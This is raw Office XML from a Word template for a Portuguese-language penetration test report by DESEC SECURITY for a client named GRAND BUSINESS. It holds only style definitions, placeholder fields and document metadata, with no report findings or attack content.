  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009D3B4B"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4F81BD" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
      <w:ind w:left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itleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="009D3B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3B4B"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="85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SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="009D3B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table" w:styleId="MediumGrid2-Accent1">
    <w:name w:val="Medium Grid 2 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="68"/>
    <w:rsid w:val="00A96D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">
    <w:name w:val="Medium Grid 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="68"/>
    <w:rsid w:val="007503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2">
    <w:name w:val="Medium Shading 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="64"/>
    <w:rsid w:val="007503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B16B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Shading-Accent4">
    <w:name w:val="Light Shading Accent 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="00B16B7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D1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D15D5"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="pt-BR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B07E0E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0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B07E0E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia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E42214"/>
    <w:rPr>
      <w:color w:val="800080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940D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grandbusiness.com.br" TargetMode="Externa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hyperlink" Target="mailto:contato@desec.com.br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glossaryDocument" Target="glossary/document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2898FFFF1E4F5EB4B34C550A6670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982058-71AA-4FC4-989F-AADB21C1DD52}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00F1601F" w:rsidRDefault="00801926" w:rsidP="00801926">
          <w:pPr>
            <w:pStyle w:val="D52898FFFF1E4F5EB4B34C550A6670E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Digite o título do documento]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="5D145E3A0D014D5FA2C4CE682CF61A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CA332F-ABBE-4AD7-BEC4-D39B0ED94FF9}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00F1601F" w:rsidRDefault="00801926" w:rsidP="00801926">
          <w:pPr>
            <w:pStyle w:val="5D145E3A0D014D5FA2C4CE682CF61A07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Digite o subtítulo do documento]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="C98B6BFFA813483E9278C702C4778D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911CBC-EE23-4AF2-9873-17BCFC787B13}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00F1601F" w:rsidRDefault="00801926" w:rsidP="00801926">
          <w:pPr>
            <w:pStyle w:val="C98B6BFFA813483E9278C702C4778DC3"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>[Digite o nome do autor]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="C1177311645E4B59BBA2A7E08CA00F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77003F-F533-4F47-828C-B164B3DD2C29}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00F1601F" w:rsidRDefault="00801926" w:rsidP="00801926">
          <w:pPr>
            <w:pStyle w:val="C1177311645E4B59BBA2A7E08CA00FF8"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>[Escolha a data]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="F0E419BA53104E27995CEEE9576C1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12423B-7328-483C-B2CB-B72F732224BE}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00F1601F" w:rsidRDefault="00801926" w:rsidP="00801926">
          <w:pPr>
            <w:pStyle w:val="F0E419BA53104E27995CEEE9576C168B"/>
          </w:pPr>
          <w:r>
            <w:t>[Digite aqui o resumo do documento. Em geral, o resumo é uma breve descrição do conteúdo do documento. Digite aqui o resumo do documento. Em geral, o resumo é uma breve descrição do conteúdo do documento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-Bold">
    <w:altName w:val="Helvetica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C45"/>
    <w:rsid w:val="001438D1"/>
    <w:rsid w:val="002C65E9"/>
    <w:rsid w:val="00433C45"/>
    <w:rsid w:val="006F6DE7"/>
    <w:rsid w:val="00801926"/>
    <w:rsid w:val="00F1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B6375DC71F4E7DB51869FA3925683D">
    <w:name w:val="D2B6375DC71F4E7DB51869FA3925683D"/>
    <w:rsid w:val="00433C45"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="53AC79B25FD144AA8739A5959ADEF813">
    <w:name w:val="53AC79B25FD144AA8739A5959ADEF813"/>
    <w:rsid w:val="00433C45"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3BD02B577D3F48208712425AB919DC2F">
    <w:name w:val="3BD02B577D3F48208712425AB919DC2F"/>
    <w:rsid w:val="00433C45"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C265A19D0C474CD1B5EEF9679DEC5A13">
    <w:name w:val="C265A19D0C474CD1B5EEF9679DEC5A13"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3C825B81EB524264BDF787F63E631BDE">
    <w:name w:val="3C825B81EB524264BDF787F63E631BDE"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C10AF71ACFAF4F8882DAB3EACC6932BA">
    <w:name w:val="C10AF71ACFAF4F8882DAB3EACC6932BA"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B8A48D20D90846E1906F86F60E42D90A">
    <w:name w:val="B8A48D20D90846E1906F86F60E42D90A"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="307A8AC58C134173A88B41B83C70C7D5">
    <w:name w:val="307A8AC58C134173A88B41B83C70C7D5"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FF697B4D2E8C44AEA90B7F8B7840B5F3">
    <w:name w:val="FF697B4D2E8C44AEA90B7F8B7840B5F3"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A599D6CF50E0431280FCF64831F398B8">
    <w:name w:val="A599D6CF50E0431280FCF64831F398B8"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10AC23BBAF284F15B7885EF572870DD5">
    <w:name w:val="10AC23BBAF284F15B7885EF572870DD5"/>
    <w:rsid w:val="001438D1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0DF5B8D83FE940BD81E3B4B18583EC6C">
    <w:name w:val="0DF5B8D83FE940BD81E3B4B18583EC6C"/>
    <w:rsid w:val="00801926"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D52898FFFF1E4F5EB4B34C550A6670E0">
    <w:name w:val="D52898FFFF1E4F5EB4B34C550A6670E0"/>
    <w:rsid w:val="00801926"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5D145E3A0D014D5FA2C4CE682CF61A07">
    <w:name w:val="5D145E3A0D014D5FA2C4CE682CF61A07"/>
    <w:rsid w:val="00801926"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C98B6BFFA813483E9278C702C4778DC3">
    <w:name w:val="C98B6BFFA813483E9278C702C4778DC3"/>
    <w:rsid w:val="00801926"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C1177311645E4B59BBA2A7E08CA00FF8">
    <w:name w:val="C1177311645E4B59BBA2A7E08CA00FF8"/>
    <w:rsid w:val="00801926"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="F0E419BA53104E27995CEEE9576C168B">
    <w:name w:val="F0E419BA53104E27995CEEE9576C168B"/>
    <w:rsid w:val="008019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01T00:00:00</PublishDate>
  <Abstract>ESTE RELATÓRIO CONTÉM INFORMAÇÃO CONFIDENCIAL E NÃO DEVE SER ENVIADO POR E-MAIL,FAX OU QUALQUER OUTRO MEIO ELETRÔNICO A MENOS QUE ESTE SEJA PREVIAMENTE APROVADO PELAS POLITICAS DE SEGURANÇA DA CONTRATANT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7C5BD9-C28E-3F46-B8CB-28C8D1A5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313</Words>
  <Characters>13185</Characters>
  <Application>Microsoft Macintosh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tório Teste de Intrusão</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>DESEC SECURITY</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15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Teste de Intrusão</dc:title>
  <dc:subject>Cliente: GRAND BUSINESS</dc:subject>
  <dc:creator>DESEC SECURITY</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2014-11-06T13:28:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-17T19:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-17T19:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>